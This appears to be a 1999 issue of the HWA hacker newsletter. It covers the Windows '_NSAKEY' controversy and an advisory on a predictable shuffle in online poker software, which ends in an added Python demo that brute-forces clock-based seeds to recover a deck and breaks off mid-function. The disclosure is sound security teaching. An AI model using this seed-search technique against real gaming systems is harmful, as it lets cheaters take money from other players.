Michael Stroud reports from Los Angeles. Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed @HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(No mail worthy of posting here this issue,) Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, let's give the message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up...

==============================================================================

02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>   /* needed for printf */

int main(void)
{
    printf ("Read commented source!\n\n");

    /* This issue is a little late, sorry 'bout that but I got a new toy
     * and have been spending time setting it up and playing with it, it's
     * a PII 400 with Voodoo III 3000 and a Diamond Monster sound 3d card
     * with a 19" monitor and 10 gig hd plus a DVD drive and HP 8100 CDRW
     * all that connects to a soho 5 port CAT5 hub which goes out to the
     * cablemodem, my other system will be delegated to FreeBSD and the
     * Linux box remains untouched. FreeBSD will be bestowed with a 13G
     * HD and I am probably going to bring Linux 'up front' as a proxy
     * and shell server at some point... so yay me
     *
     * This issue has a couple of articles contributed by wyzewun of FK
     * (Forbidden Knowledge) a .ZA zine that sheds some light on the hack
     * / security scene in South Africa so read on and enjoy the issue...
     *
     * Cruciphux
     */
    printf ("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:.

03.0 NSA Key Found in Windows
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com contributed by netmask

Over the weekend a cryptography key with the label of NSA has been found within MS Windows. Some have immediately assumed that this was a back door that would allow the National Security Agency access to any Windows based system. Microsoft has vehemently denied the charge. Others have also stated that such a conclusion, while possible, is unlikely. The most likely scenario is that the key was included to pass export restrictions set up by the NSA and was therefore labeled appropriately.

Wired http://www.wired.com/news/news/technology/story/21577.html
Wired - Second Story http://www.wired.com/news/news/technology/story/21589.html
Associated Press - Via San Jose Mercury News http://www.sjmercury.com/svtech/news/breaking/ap/docs/817660l.htm
ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2328464,00.html
The Australian Age http://www.theage.com.au/daily/990904/news/news50.html
OSALL - Review of the Aftermath http://www.aviary-mag.com/News/NSA_FUD/nsa_fud.html
Microsoft - The Response http://www.microsoft.com/presspass/press/1999/Sept99/RSAPR.htm

The real interesting part of this whole story is that this isn't new. This issue is over three years old.

JYA.com http://jya.com/msnsa-not.htm

-=-

Wired;

MS Denies Windows 'Spy Key' by Steve Kettmann and James Glave
10:20 a.m. 3.Sep.99.PDT

Microsoft is vehemently denying allegations by a leading cryptographer that its Windows platform contains a backdoor designed to give a US intelligence agency access to personal computers. 
Andrew Fernandes, chief scientist for security software company Cryptonym in Mississauga, Ontario, claimed on his Web site Friday that the National Security Agency may have access to the core security of most major Windows operating systems. "By adding the NSA's key, they have made it easier -- not easy, but easier -- for the NSA to install security components on your computer without your authorization or approval," Fernandes said. But Microsoft denied that the NSA has anything to do with the key. "The key is a Microsoft key -- it is not shared with any party including the NSA," said Windows NT security product manager Scott Culp. "We don't leave backdoors in any products." Culp said the key was added to signify that it had passed NSA encryption standards. Fernandes also simultaneously released a program on his site that will disable the key. The key exists in all recent versions of the Windows operating systems, including Windows 95, 98, 2000, and NT. The issue centers around two keys that ship with all copies of Windows. The keys grant an outside party the access it needs to install security components without user authorization. The first key is used by Microsoft to sign its own security service modules. Until late Thursday, the identity and holder of the second key had remained a mystery. In previous versions of Windows, Fernandes said Microsoft had disguised the holder of the second key by removing identifying symbols. But while reverse-engineering Windows NT Service Pack 5, Fernandes discovered that Microsoft left the identifying information intact. He discovered that the second secret key is labeled "_NSAKEY." Fernandes and many other security experts take that to stand for the National Security Agency -- the nation's most powerful intelligence agency. Microsoft said _NSAKEY signifies that it satisfies security standards. Through its "signals intelligence" division the NSA listens in on the communications of other nations. 
The NSA did not immediately respond to a request for comment via fax, the only way the agency communicates with inquiries from the media. The agency also operates Echelon, a global eavesdropping network that is reportedly able to intercept just about any form of electronic communications anywhere in the world. The agency is forbidden by law from eavesdropping on American citizens. Marc Briceno, director of the Smartcard Developer Association, said the inclusion of the key could represent a serious threat to e-commerce. "The Windows operating-system-security compromise installed by Microsoft on behalf of the NSA in every copy of Windows 95, 98, and NT represents a serious financial risk to any company using MS Windows in e-commerce applications," Briceno wrote in an email. "With the discovery of an NSA backdoor in every copy of the Windows operating systems sold worldwide, both US and especially non-US users of Microsoft Windows must assume that the confidentiality of their business communications has been compromised by the US spy agency," Briceno said. Briceno coordinated the team that broke the security in GSM cell phones, demonstrating that the phones are subject to cloning -- a feat the cellular industry had thought impossible. In making the discovery, Fernandes said he did not know why the key was there. "It could be for espionage. It may not be," he said. "It does not totally compromise Windows, it only weakens it.... The only real reason I can see is for them to be able to install their own security providers." But Microsoft's Culp said all cryptographic software intended for export must be submitted to a National Security Agency review process. He said that the key was so named to indicate that it had completed that process and that it complied with export regulations. 
"The only thing that this key is used for is to ensure that only those products that meet US export control regulations and have been checked can run under our crypto API (application programming interface)," Culp said. "It does not allow anyone to start things, stop services, or allow anything [to be executed] remotely," he said. "It is used to ensure that we and our cryptographic partners comply with United States crypto export regulations. We are the only ones who have access to it." Fernandes made the discovery in early August, he said, but collaborated with the Berlin-based Chaos Computer Club and other experienced hackers worldwide before releasing the information. "We coordinated this through the worldwide hacker scene," said Andy Muller-Maguhn of the CCC. "It was important to American hackers that it not only be mentioned in America but also in Europe. "For American citizens it seems to be normal that the NSA is in their software. But for countries outside of the United States, it is not. We don't want to have the NSA in our software." Coming less than a week after Microsoft was rocked by the embarrassing news that its Hotmail system could be easily penetrated, the latest disclosure could prove damaging to the software giant. "Say I am at a large bank, and I have the entirety of our operation working on Windows," Fernandes said. "That is a little more serious. The only people who could get in there are the NSA, but that might be bad enough. "They have to first manage to download a file into your machine. There may be backdoors that allow them to do that.... I would be shocked and surprised if the NSA bothered with individuals. What is more of a concern is security systems for a large bank or another data center. Or even a Web server firm. 
"The result is that it is tremendously easier for the NSA to load unauthorized security services on all copies of Microsoft Windows, and once these security services are loaded, they can effectively compromise your entire operating system. "The US government is currently making it as difficult as possible for 'strong' crypto to be used outside of the US; that they have also installed a cryptographic backdoor in the world's most abundant operating system should send a strong message to foreign IT managers," he said. But Fernandes did not want to set off a panic -- or at least not for everyone. "I personally don't care if the NSA can get into my machine, because I think they have better ways of spying on me as a person," Fernandes said. "But if I was a CEO of a large bank, that would be a different story." Before Microsoft's explanation, many leading cryptographers said they were convinced it was a key for the NSA. "I believe it is an NSA key," said Austin Hill, president of anonymous Internet service company Zero-Knowledge Systems. "We walked through it and talked about all the scenarios why it is there, and this was our conclusion," said Hill. He said that he and Zero-Knowledge's chief scientist, Ian Goldberg, did not believe the key's name is a joke placed there by a Microsoft programmer -- one possible explanation. "Microsoft has not shown incredible competence in the area of security," Hill added. "We call on Microsoft to learn about open security models that provide independent verification of design. No secure system is based on security by obscurity." -=- Wired #2; Debate Flares over MS 'Spy Key' by James Glave 3:00 a.m. 4.Sep.99.PDT Questions lingered Friday over whether or not security experts overreacted to a scientist's charge that Microsoft built a backdoor in Windows for a US spy agency to enter. Microsoft vehemently denied the claims of Andrew Fernandes, chief scientist for security software company Cryptonym. 
"It is a non-story," Microsoft Windows NT security product manager Scott Culp told Wired News. "We don't leave backdoors in any products." See also: MS Denies Windows 'Spy Key' In an early Friday statement posted to his company's Web site, Fernandes had claimed that Microsoft had granted the National Security Agency secret access to the core security of most major Windows operating systems. He made his claims after discovering the name of a key that grants access to the highest level of Windows data-scrambling software code, without the user's permission. The key is named _NSAKEY. The charges seemed to confirm the worst fears of many, and Internet mailing lists erupted early Friday in a Krakatoa of anti-Microsoft sentiment. "Windows is compromised!! Microsoft is in bed with the Federal Government," wrote one poster to a mailing list addressing privacy and crypto issues. The climate was certainly primed for hysteria. Last week, experts uncovered a major flaw in the way Microsoft implements the Java computer language. The company had barely addressed that problem when a gaping hole exposed the private email of potentially millions of Hotmail members -- perhaps the most widespread security incident in the Web history. Microsoft dismissed Friday's charges as nonsense. The company said that the key was named after the spy agency merely to reflect the fact that it had passed a technical review that the agency requires of all security software intended for export. But Fernandes stood his ground. "Some of the things [Microsoft said] make sense, some of them don't," he said. The _NSAKEY is one of two such keys buried deep in the cryptography source code of most Windows operating systems. In other reports, Microsoft said that the _NSAKEY is still a Microsoft-controlled key that will serve as a backup in the event that the first key is compromised. That just doesn't make sense, Fernandes said. 
"If they lost the first key which is the equivalent to them losing the Windows source code, then that would be okay, they could just start using the backup key." "But if all of Windows was compromised [by a hacker], they would have to reissue all of Windows and overwrite [the second key] on top of all copies of Windows out there, which can happen, but it's unlikely." "Their story only kind of makes sense," he added. "If that is in fact true, it means their crypto protocol is poor, there is no other word for it." Crypto expert Marc Briceno did have another word for it: "feeble." "I must say I do not believe Microsoft's present explanation that the presence of the _NSAKEY corresponds to standard practices in software development," said Marc Briceno, director of the Smartcard Developer Association. "There is no technical reason for Microsoft to include a second security module verification key in their operating system ... to mark the passing of export requirements," Briceno said. But a respected independent Windows NT security consultant said that in the wake of Microsoft's denials, the NSA backdoor allegations amount to conspiracy theories. "There's a bunch of somewhat understandable furor going on over the idea that the NSA might have a backdoor to Windows," wrote Russ Cooper, moderator of the NTBugtraq Windows security resource. "Unfortunately, however, all of this is based on a variable name," he added. "Anyone who programs knows that variables might get named anything for a variety of reasons." He said the lion's share of individuals overreacting to the claims are freedom fighters and privacy advocates. "Unfortunately they have a loud voice," he said. "I don't think they are representative of the average person, the real people that populate the Net," he said. "We give away all kinds of things, every day, that sacrifice our privacy. These privacy advocates, I'd put them in the category of the Michigan Militia, the Ruby Ridge folks." 
But John Gilmore, a co-founder of the Electronic Freedom Foundation, said that the case was far from clear. Gilmore quoted Microsoft's Scott Culp, who said in a previous Wired News story that the _NSAKEY was only in place "to ensure that we and our cryptographic partners comply with United States crypto export regulations." Gilmore said that the crypto community has always wondered what exactly the deal was between NSA and Microsoft that allows the company to plug strong crypto into software that is sold worldwide. Culp's response was "disingenuous but not false," he wrote in an email to Wired News. "This key was part of the quid-pro-quo that NSA extracted to issue the export license. Let's hear what the whole quid-pro-quo was and what the key is *actually* used for," Gilmore wrote. For its part, the NSA isn't telling. In a short faxed reply to a Wired News query about the purpose of the key, the super-secretive agency said the matter was up to Microsoft. "US export control regulations require that cryptographic [application program interfaces] be signed," NSA's public affairs office wrote. "The implementation of this requirement is left up to the company. Specific questions about specific products should be addressed to the company." Associated Press story; Microsoft denies helping govt snoop BY TED BRIDIS Associated Press Writer WASHINGTON (AP) -- Microsoft Corp. sought to assure consumers Friday that it did not insert a secret backdoor in its popular Windows software to allow the U.S. government to snoop on their sensitive computer data. The sensational charge of a quiet alliance between Microsoft and the U.S. National Security Agency came after a Canadian programmer stumbled across an obscure digital ``signing key'' that had been labeled the ``NSA key'' in the latest version of Microsoft's business-level Windows NT software. 
An organization with such a signature key accepted by Windows could theoretically load software to make it easier to look at sensitive data -- such as e-mail or financial records -- that had been scrambled. The flaw would affect almost any version of Windows, the software that runs most of the world's personal computers. Microsoft forcefully denied that it gave any government agency such a key, and explained that it called its function an ``NSA key'' because that federal agency reviews technical details for the export of powerful data-scrambling software. ``These are just used to ensure that we're compliant with U.S. export regulations,'' said Scott Culp, Microsoft's security manager for its Windows NT Server software. ``We have not shared the private keys. We do not share our keys.'' The claim against Microsoft, originally leveled by security consultant Andrew Fernandes of Mississauga, Ontario, on his Web site, spread quickly in e-mail and discussion groups across the Internet, especially in those corners of cyberspace where Microsoft and the federal government are often criticized. Culp called Fernandes' claims ``completely false.'' An NSA spokesman declined immediate comment. Bruce Schneier, a cryptography expert, said the claim by Fernandes ``makes no sense'' because a government agency as sophisticated as the NSA doesn't need Microsoft's help to unscramble sensitive computer information. ``That it allows the NSA to load unauthorized security services, compromise your operating system -- that's nonsense,'' said Schneier, who runs Counterpane Internet Security Inc. ``The NSA can already do that, and it has nothing to do with this.'' Fernandes, who runs a small consulting firm in Canada, said he found the suspiciously named ``NSA key'' -- along with another key for Microsoft -- while examining the software code within the latest version of Windows NT. 
The existence of the second key was discovered earlier by other cryptographers, but Fernandes was the first to find its official name and theorize about its purpose. ``That (the U.S. government) has ... installed a cryptographic back door in the world's most abundant operating system should send a strong message to foreign (information technology) managers,'' he warned on his Web site. But Fernandes seemed less worried Friday in a telephone interview. ``I don't know that they have reason to lie,'' he said. ``The main point is, you can't really trust what they're saying. They've been caught with their hand in the cookie jar. In fact, I think they're being fairly honest, but you don't know what else is in Windows.'' -=- ZDNET; -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- MS denies giving NSA key By Lisa M. Bowman, ZDNN September 3, 1999 3:03 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2328464,00.html Updated at 6:20 PM PT Microsoft is denying claims by a Canadian security company that it has installed a second key in its Windows programs in order to give the U.S. government access to users' computers. Instead, it said it's only following the rules imposed by the U.S. to allow software exports. Andrew Fernandes, the chief scientist of Cryptonym, had claimed that a second key in several versions of the company's Windows operating system contains coding using the letters "NSA," which he said indicated that Microsoft (Nasdaq:MSFT) may be providing a key for the National Security Agency. But Microsoft said it's not, and calls the incident a "tempest in a teapot." Instead, Windows NT security product manager Scott Culp said the company was merely complying with federal rules imposed by the U.S. Commerce Department and NSA to meet export control requirements. 
Culp said the keys have been used for years to verify the digital signatures of partner companies using its crypto application programming interface (API), and to verify that they're export approved. "They're in there because that's how we comply with export controls that the NSA is overseeing," he said. Bad name But he acknowledges the term "NSA" key could arouse suspicion. "It's a really bad name," he said. "I think we're going to rename it after today." The keys are in every copy of Windows 95, 98, NT4 and 2000. The owner of such keys could potentially infiltrate software by using them to go through a so-called "back door" in the software. Because the U.S. government limits the export of strong encryption software, some software makers provide such keys to the government. But Microsoft said it's doing no such thing. "It's totally against our corporate policy," Culp said. The NSA faxed a statement deferring specific questions to Microsoft. Fernandes started his work last year, after two software developers discovered the presence of a second key, but said they didn't know why it was created. Fernandes piggy-backed on that research to learn more about the second key. *** The good news, Fernandes said, is that companies can use a security flaw in the NSA key to add their own strong encryption, in effect overriding the key. More information is at the Cryptonym site. However, even Fernandes said he didn't know for sure if the NSA coding in Windows really refers to the government agency. "I'm in the security business, and the security business is the business of paranoia," he said. Security consultant Richard Smith, president of Phar Lap Software, said the discovery was a minor one. "As in most cases, where there's smoke there's usually fire," he said. "But in my opinion this isn't a very big fire." Fernandes' claim came just two weeks after news began circulating that the U.S. 
Department of Justice was asking for special legislation that would let them spy on computers without a warrant or a user's knowledge. -=- The Australian Age; Microsoft denies it gives government access to Windows By Ted Bridis WASHINGTON, Sept 4 AP - Microsoft Corp sought to assure consumers that it did not insert a secret backdoor in its popular Windows software to allow the US government to snoop on their sensitive computer data. The sensational charge of a quiet alliance between Microsoft and the US National Security Agency came after a Canadian programmer stumbled across an obscure digital ``signing key'' that had been labeled the ``NSA key'' in the latest version of Microsoft's business-level Windows NT software. An organisation with such a signature key accepted by Windows could theoretically load software to make it easier to look at sensitive data _ such as e-mail or financial records _ that had been scrambled. The flaw would affect almost any version of Windows, the software that runs most of the world's personal computers. Microsoft forcefully denied yesterday that it gave any government agency such a key, and explained that it called its function an ``NSA key'' because that federal agency reviews technical details for the export of powerful data-scrambling software. ``These are just used to ensure that we're compliant with US export regulations,'' said Scott Culp, Microsoft's security manager for its Windows NT Server software. ``We have not shared the private keys. We do not share our keys.'' The claim against Microsoft, originally leveled by security consultant Andrew Fernandes of Mississauga, Ontario, on his Web site, spread quickly in e-mail and discussion groups across the Internet, especially in those corners of cyberspace where Microsoft and the federal government are often criticised. Culp called Fernandes' claims ``completely false.'' An NSA spokesman declined immediate comment. 
Bruce Schneier, a cryptography expert, said the claim by Fernandes ``makes no sense'' because a government agency as sophisticated as the NSA doesn't need Microsoft's help to unscramble sensitive computer information. ``That it allows the NSA to load unauthorised security services, compromise your operating system _ that's nonsense,'' said Schneier, who runs Counterpane Internet Security Inc. ``The NSA can already do that, and it has nothing to do with this.'' Fernandes, who runs a small consulting firm in Canada, said he found the suspiciously named ``NSA key'' _ along with another key for Microsoft _ while examining the software code within the latest version of Windows NT. The existence of the second key was discovered earlier by other cryptographers, but Fernandes was the first to find its official name and theorise about its purpose. ``That (the US government) has ... installed a cryptographic back door in the world's most abundant operating system should send a strong message to foreign (information technology) managers,'' he warned on his Web site. But Fernandes seemed less worried yesterday in a telephone interview. ``I don't know that they have reason to lie,'' he said. ``The main point is, you can't really trust what they're saying. They've been caught with their hand in the cookie jar. In fact, I think they're being fairly honest, but you don't know what else is in Windows.'' -AP -=- OSALL Review of the aftermath; NSA Crypto API Key FUD Mike Hudack Editor-in-Chief Some people can claim to have never spread FUD (Fear, Uncertainty and Doubt) in their lives. I guess I can no longer claim such a distinction. I came home from school on Friday around 2:45 (seven or so hours ago) to more than fifty e-mails asking me about the NSA key included in Windows. I moved fast -- too fast. I wrote a story on it, quoting sources I had already read and referencing those sources. 
About half an hour ago I changed the story slightly, making it clear that we had not independently confirmed the action of this second key in the Microsoft Crypto API. The slightly revised article is still here as NSA Backdoor. I moved quickly, calling my media contacts to ensure they knew what was going on. CNN was already working on a story and others had already run with it. Some were waiting for more word. Pressed with Internet time, everyone who was publishing on the Web had already gone with the story, some more tentatively than others. As time went on I began to realize there were a few things wrong with the conclusions being drawn. I didn't want to reverse my position too soon though, and I kept pushing my opinions -- and my natural distrust for the NSA and Microsoft -- although less strenuously. It was around seven o'clock in the evening that I realized something was wrong. The second key included in the Crypto API may have been inserted by the NSA (hence the name) as a backup to the Microsoft key -- and intended only for use on NSA machines. There were a dozen possible explanations, some discussed in the article NSA Ramifications on OSAll. At eight o'clock I began writing this article, double-checking my sources. My NSA contact had called me around nine and told me "I have no idea what's going on. We use NT for a couple things and install some Crypto API programs for tests." That was part of the last straw for me... That and Russ Cooper's wonderful posting to NT Bugtraq did it for me (hopefully we'll get permission from Russ to publish that post here -- it's pending). I'm making no excuses for helping to spread FUD through my over-eager analyzation and reporting, but the pressures of Internet time -- and the lost time of school -- were major issues. -=- Microsoft's spin; Microsoft Says Speculation About Security and NSA Is "Inaccurate and Unfounded" REDMOND, Wash. - Sept. 3, 1999 - Microsoft Corp. 
said today that speculation about Microsoft® Windows® security and the U.S. National Security Agency (NSA) is "inaccurate and unfounded." In response to speculation by a Canadian cryptography company that Microsoft had somehow allowed the NSA to hold a "backdoor" key to the encryption framework in its Windows operating system, Microsoft issued the following statement: "This report is inaccurate and unfounded. The key in question is a Microsoft key. It is maintained and safeguarded by Microsoft, and we have not shared this key with the NSA or any other party. "Microsoft takes security very seriously. This speculation is ironic since Microsoft has consistently opposed the various key escrow proposals suggested by the government because we don't believe they are good for consumers, the industry or national security. "Contrary to this report, the key in question would not allow security services to be started or stopped without the user's knowledge." Microsoft said the key is labeled "NSA key" because NSA is the technical review authority for U.S. export controls, and the key ensures compliance with U.S. export laws. The company reiterated that Microsoft has not shared this key with the NSA or any other company or agency. Founded in 1975, Microsoft (Nasdaq "MSFT") is the worldwide leader in software for personal computers. The company offers a wide range of products and services for business and personal use, each designed with the mission of making it easier and more enjoyable for people to take advantage of the full power of personal computing every day. Microsoft and Windows are either registered trademarks or trademarks of Microsoft Corp. in the United States and/or other countries. Other product and company names herein may be trademarks of their respective owners. 
Note to editors: If you are interested in viewing additional information on Microsoft, please visit the Microsoft Web page at http://www.microsoft.com/presspass/ on Microsoft's corporate information pages. -=- JYA's take on the whole deal; From: "Brian Gladman" To: "UK Crypto List" Subject: Re: NSA key in Windows Date: Mon, 6 Sep 1999 14:23:33 +0100 I am always surprised about just how long it takes to recognise the political implications of simple technological decisions. The Microsoft CAPI issue is well over ***three years old*** and to illustrate this here is a URL for a paper that I wrote in early 1996 to try and get action from the UK government and from the EU when this issue first arose: http://www.seven77.demon.co.uk/capi.pdf [HTML below] In my view the real issue here is not an NSA backdoor (I doubt that one exists in the form postulated) but rather the principle that Microsoft should allow the US government to impose its cryptographic export controls on other sovereign countries by controlling access to the relevant interfaces for integrating cryptographic Service Providers (CSPs) into Windows. When this was topical back in 1996 I objected vigorously to this approach (with ***support*** from GCHQ/CESG!) It took a lot of effort but the UK, at least, did establish a Microsoft UK based capability for signing cryptographic modules separate from that in the US. I might also add that I had access in the UK to the Microsoft CSPDK (Cryptographic Service Provider Developer Kit) in 1997 and the keys now being discussed were openly a part of the CSPDK at the time. If this was an NSA backdoor then they did not make a very good job of hiding it! Hence, while I believe that Microsoft should be criticised for allowing itself to be used by the US government to impose extra-territorial controls on crypto, I am very doubtful that they co-operated in the provision of any backdoor of the form now proposed. 
Brian

@HWA

04.0 Online Gambling is not Secure
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Mathew

Besides worrying about how secure your personal information is you now also have to worry about whether the software you are using is playing fair. Reliable Software Technologies has uncovered a serious flaw in the implementation of Texas Hold 'em Poker that is distributed by ASF Software, Inc. This software is used by www.planetpoker.com, www.purepoker.com, and www.deltacasino.com all of whom have been notified of this flaw. The flaw exists in the card shuffling algorithm used to generate each deck which allows a malicious user to know the cards in each player's hand in real time.

Reliable Software Technologies
http://www.rstcorp.com/news/gambling.html

CNN
http://www.cnn.com/TECH/computing/9909/03/internet.poker/index.html (Video stream)

-=-

Reliable Software Technologies

FOR IMMEDIATE RELEASE
September 1, 1999
Press Contact Information

Internet Gambling Software Flaw Discovered by Reliable Software Technologies Software Security Group

Dulles, VA - The Software Security Group at Reliable Software Technologies, the leading authority and industry visionary on software assurance for security-critical software, today announced the discovery of a major security flaw in Internet Gambling software. The flaw can be exploited to bilk innocent players of actual money in online poker games.

Regardless of its quasi-legal status, online gambling presents an entire raft of risks. Key questions include: Will your personal information be handled securely (for example, will the credit card number you're paying with be stolen or the fact that you're gambling at all be leaked)? What if the gaming site is hacked? Could you be playing against cheating insiders or players acting in collusion? Are the games implemented correctly and fairly? Is the software secure?

In response to the last question, we have demonstrated that the answer is no.
The Software Security Group at Reliable Software Technologies has discovered a serious flaw in the implementation of Texas Hold 'em Poker that is distributed by ASF Software, Inc.. We have exploited this flaw in the lab. Our exploit allows a player (us) to calculate the exact deck being used for each hand in real time. That means a player using our exploit knows the cards in every opponent's hand as well as the cards that will make up the flop (cards placed face up on the table after rounds of betting). We can always make the right decision, and consequently maximize our earnings. A malicious attacker could use our exploit to bilk innocent players of actual money without ever being caught. ASF Software and all of their online casino customers have been notified of the flaw. Currently we know of three online casinos (www.planetpoker.com, www.purepoker.com, and www.deltacasino.com) that appear to use ASF Software's implementation of Texas Hold 'em Poker. All three Websites allow players to compete for real money. There is also a demo casino that allows players to gamble with play money. We used our exploit against the demo casino. We also demonstrated, without actually cheating, that it could be used against real money casinos. The flaw exists in the card shuffling algorithm used to generate each deck. Ironically, the code was publicly displayed at www.planetpoker.com/ppfaq.htm with the idea of showing how fair the game is to interested players (the relevant question has since been removed). In the code, a call to randomize() is included to produce a random deck before each deck is generated. The implementation, built with Delphi 4 (a Pascal IDE), seeds the random number generator with the number of milliseconds since midnight according to the system clock. That means the output of the random number generator is easily predicted. A predictable "random number generator" is a very serious security problem. The scenario below illustrates the problem. 
The first screen shows an actual game in progress. In this scene, we are jonnyboy (whose cards are shown face up) and three "flop" cards are displayed. Two other players are participating, but their cards are not displayed (for obvious reasons).

By synchronizing our clock with the clock on the online casino and hitting the "shuffle" button, our program can calculate the exact shuffle. That means we know all the cards that have yet to appear, everyone's hand, and who will win. The screen shot below shows the information displayed by our program in realtime during an actual game. Our program knows what cards are to appear in advance, before they are revealed by the online game.

As you can see in the screen shown below, taken at the conclusion of the demonstration game, our program has correctly determined all the cards. Given our program, a malicious user would know when to hold 'em and know when to fold 'em with 100% accuracy. This information can be used to win money from unsuspecting players.

A typical hand involves $30-1000 in the pot. We estimate over $100,000 worth of money changes hands daily on the four most popular online poker sites.

There are a number of other problems in the poker implementation that could lead to complete security compromise. We have only exploited the easiest one at this time.

The broad take home message from this work is simple: when software misbehaves, bad things can happen. Our mission in the Software Security Group is to stamp out insecure code before it is placed in service. Members of the group involved with the Gambling exploit are: Brad Arkin, Frank Hill, Scott Marks, Matt Schmid, and TJ Walls. The Software Security Group is led by Dr. Gary McGraw.

About RST

Headquartered in Dulles, VA, Reliable Software Technologies Corp. (RST) is a leading authority and industry visionary on software assurance for critical software.
Founded on the simple, compelling premise that software must work, the company offers technology and services that help organizations deliver reliable, robust, and secure software - the essence of software assurance. With expertise in test optimization, security and metrics, RST helps corporations, independent software vendors and system integrators optimize time spent in development and test, dramatically accelerating time-to-market. Learn more about RST on the Web at http://www.rstcorp.com/. Press Contact Information Gary McGraw Reliable Software Technologies 703 404-9293 gem@rstcorp.com More Technical Details; Internet Gambling Software Flaw: More Details Playing poker is risky by nature, but playing online poker for real money may be more of a gamble than you ever expected. The Software Security Group at Reliable Software Technologies (www.rstcorp.com) has discovered a serious flaw in the implementation of Texas Hold 'em Poker that is distributed by ASF Software, Inc. (www.asfgames.com). We were able to develop a program that exploits this flaw and is capable of determining the exact ordering of every card in a shuffled deck; this computation can be performed in real-time, during the playing of an actual poker game. This exploit enables someone to know every card that each player has been dealt and what cards will be coming up during the rest of the hand. Given this information, even the weakest of poker players should know when to hold'em, and when to fold'em. Unlike most casino games, poker is played against other players, not against the house. This means that when someone is cheating at poker, innocent people are hurt by the cheater's unscrupulous actions. ASF Software has been notified of the flaw in their system and has taken corrective actions. The exploit that Reliable Software Technologies developed no longer functions, however the potential for people to take advantage of flaws in online gambling software remains. 
The flaw existed in the algorithm used to produce a shuffled deck of cards before each round of play. Ironically, the code was publicly displayed at www.planetpoker.com/ppfaq.htm with the idea of showing how fair the game is to interested players (the page has since been taken down). The algorithm revealed that the cards were being shuffled using random numbers generated by the Delphi Pascal Random() function.

Like most common random number generators, the Random() call uses the Lehmer algorithm to produce streams of pseudo-random numbers. These numbers have many of the mathematical properties associated with random numbers, however they are generated in a completely deterministic manner. This means that given a particular starting point (the random number generator's "seed") the sequence of numbers generated will follow an easily calculated pattern.

The shuffling algorithm used in this software always started with an ordered deck of cards, and then generated a sequence of random numbers that were used to re-order the deck. The seed for a 32-bit random number generator must be a 32-bit number, meaning that there are just over 4 billion possible seeds. This constrains the algorithm to being able to produce only slightly more than 4 billion possible decks of cards; a number much smaller than the 52 factorial (52 * 51 * 50 * … 1) combinations possible in a real deck of cards. The resulting number is close to 2^225.

To make matters worse, the algorithm chose the seed for the random number generator using the Pascal function Randomize(). The Randomize() function chose a seed based on the number of milliseconds since midnight. Since there are only 86,400,000 milliseconds in a day, and this number was being used as the seed for the random number generator, the number of possible decks was now reduced to 86,400,000.
By synchronizing our program with the system clock on the server generating the pseudo-random number, we were able to further reduce the number of possible combinations down to a number on the order of 200,000 possibilities. Searching through this set of shuffles is trivial and can be done on a PC in real time.

The exploit that RST developed required that five cards from the deck were known, and the rest of the deck could then be deduced. In Texas hold'em poker, this meant that the program took as input the two cards that a player is dealt, plus the first three community cards that are dealt face up (called the flop). These five cards are known after the first of four rounds of betting. The program then generated shuffled decks of cards until it found a deck that contained these five cards in the proper positions.

Since the Randomize() function is based on the server's system time, it was not very difficult to guess a starting seed with a fair degree of accuracy. After finding a correct seed once, it is then possible to synchronize the exploit program with the server to within a few seconds. This synchronization enables the exploit program to accurately guess the seed being used by the random number generator, and to identify the deck of cards being used during all future games in under one second!

Although this particular security flaw has been patched, there is an important lesson that can be learned by both online game enthusiasts and software developers. Developing software for critical systems is a difficult and misunderstood topic. When the stakes are high, it pays to go to great lengths to ensure that software has been implemented with proper considerations for security and safety. If it is not, innocent people may be hurt or taken advantage of. A developer must understand the risks that are introduced by his / her code, and a system user must be convinced that such risks have been mitigated.
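Added example, not RST's or ASF's code: the seed-space problem described above, shown on a stand-in generator with the weak clock-seeded shuffle beside a CSPRNG-based one. ToyLCG, the Fisher-Yates shuffle, the deck positions of the five visible cards and the sample seed are all assumptions made for illustration; the page does not reproduce the published routine or Delphi's generator.

```python
import math
import secrets

MS_PER_DAY = 86_400_000  # every value a milliseconds-since-midnight seed can take
ORDERED_DECK = [rank + suit for suit in "CDHS" for rank in "23456789TJQKA"]


class ToyLCG:
    """32-bit linear congruential generator used as a stand-in.

    Assumption: this is NOT Delphi's Random(); the constants are the
    well-known Numerical Recipes ones. Only the determinism matters here.
    """

    def __init__(self, seed):
        self.state = seed & 0xFFFFFFFF

    def below(self, n):
        self.state = (self.state * 1664525 + 1013904223) & 0xFFFFFFFF
        return (self.state * n) >> 32  # integer in range(n)


def clock_seeded_deck(ms_since_midnight):
    """Weak pattern: ordered deck + PRNG seeded from the time of day."""
    rng = ToyLCG(ms_since_midnight)
    deck = ORDERED_DECK[:]
    for i in range(len(deck) - 1, 0, -1):  # Fisher-Yates (assumed shuffle)
        j = rng.below(i + 1)
        deck[i], deck[j] = deck[j], deck[i]
    return deck


def csprng_deck():
    """Hardened pattern: the shuffle draws from the OS entropy source."""
    deck = ORDERED_DECK[:]
    secrets.SystemRandom().shuffle(deck)
    return deck


def consistent_seeds(known, clock_estimate_ms, window_ms):
    """Return every seed within +/- window_ms of the estimate whose deck
    shows the cards in `known` (deck position -> card)."""
    hits = []
    for guess in range(clock_estimate_ms - window_ms,
                       clock_estimate_ms + window_ms + 1):
        seed = guess % MS_PER_DAY  # the seed wraps at midnight
        deck = clock_seeded_deck(seed)
        if all(deck[pos] == card for pos, card in known.items()):
            hits.append(seed)
    return hits


def shuffle_entropy_bits():
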